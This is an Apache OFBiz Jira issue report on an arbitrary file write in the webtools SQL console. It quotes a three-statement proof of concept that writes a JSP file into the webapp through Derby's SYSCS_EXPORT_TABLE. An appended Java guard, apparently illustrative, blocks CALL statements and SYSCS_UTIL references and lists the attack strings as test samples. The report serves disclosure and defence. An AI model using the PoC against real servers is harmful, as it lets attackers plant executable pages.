Jacques Le Roux created OFBIZ-12057:
---------------------------------------

             Summary: Prevent arbitrary file write using webtools/control/EntitySQLProcessor.
                 Key: OFBIZ-12057
                 URL: https://issues.apache.org/jira/browse/OFBIZ-12057
             Project: OFBiz
          Issue Type: Sub-task
          Components: framework/webtools
    Affects Versions: Trunk
            Reporter: Jacques Le Roux
            Assignee: Jacques Le Roux

Shuibo Ye <shuib...@gmail.com> reported a possible arbitrary file write using webtools/control/EntitySQLProcessor.

{quote}
In the "SQL Command" part, I create a table and insert some strings and export the table to a file *one sentence at a time*.

PoC:

    CREATE TABLE "test" (string VARCHAR(80))
    INSERT INTO "test" (string) VALUES ('<%= system.getProperty("user.dir") %>')
    call SYSCS_UTIL.SYSCS_EXPORT_TABLE(null,'test','.\framework\webtools\webapp\webtools\default.jsp',null,'*',null)

After executing the three sentences, I successfully write the file and its url is https://localhost:8443/webtools/default.jsp.
{quote}

--
This message was sent by Atlassian Jira
(v8.3.4#803005)
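As an added defensive example (not OFBiz project code and not the fix that was applied for this issue), a pre-execution guard for an administrative SQL console of the EntitySQLProcessor kind: it allowlists statement verbs so a CALL never reaches the Derby engine, and independently rejects any reference to the SYSCS_UTIL system-procedure schema, which is where SYSCS_EXPORT_TABLE and its file-writing siblings live. The class and method names are hypothetical.

```java
import java.util.Arrays;
import java.util.List;
import java.util.Locale;
import java.util.regex.Pattern;

/**
 * Illustrative guard run before an admin console hands SQL to the database.
 * Hypothetical example code, not part of OFBiz.
 *
 * Two independent checks, so a later allowlist change cannot silently
 * re-expose file I/O through Derby system procedures:
 *  1. Allowlist the leading statement verb; CALL and EXECUTE are deliberately absent.
 *  2. Deny any mention of the SYSCS_UTIL schema anywhere in the raw text.
 */
public final class SqlConsoleGuard {
    // Verbs an admin console legitimately needs. No CALL, no EXECUTE.
    private static final List<String> ALLOWED_VERBS =
        Arrays.asList("SELECT", "INSERT", "UPDATE", "DELETE", "CREATE", "DROP", "ALTER");

    // Derby's system-procedure schema, matched case-insensitively on the raw input.
    private static final Pattern SYSCS_REF = Pattern.compile("(?i)\\bSYSCS_UTIL\\b");

    // SQL comments are removed before the verb check so "CALL" cannot hide behind them.
    private static final Pattern COMMENTS = Pattern.compile("(?s)/\\*.*?\\*/|--[^\\r\\n]*");

    public static boolean isAllowed(String sql) {
        if (sql == null) return false;
        if (SYSCS_REF.matcher(sql).find()) return false;          // check the raw text first
        String stripped = COMMENTS.matcher(sql).replaceAll(" ").trim();
        if (stripped.isEmpty()) return false;
        // One statement per request: a ';' anywhere but the very end means a batch.
        int semi = stripped.indexOf(';');
        if (semi >= 0 && semi != stripped.length() - 1) return false;
        String verb = stripped.split("\\s+", 2)[0].toUpperCase(Locale.ROOT);
        return ALLOWED_VERBS.contains(verb);
    }

    public static void main(String[] args) {
        String[] samples = {                                       // constructed inputs
            "SELECT * FROM \"test\"",
            "CREATE TABLE \"test\" (string VARCHAR(80))",
            "call SYSCS_UTIL.SYSCS_EXPORT_TABLE(null,'test','out.jsp',null,'*',null)",
            "/* hidden */ CALL syscs_util.SYSCS_IMPORT_TABLE(null,'t','in.csv',null,null,null,0)",
            "SELECT 1; CALL some_proc()"
        };
        for (String s : samples) {
            System.out.println((isAllowed(s) ? "ALLOW " : "REJECT") + "  " + s);
        }
    }
}
```

The first two samples pass and the last three are refused; the CREATE and INSERT steps of the report are harmless on their own, since without the CALL nothing leaves the database.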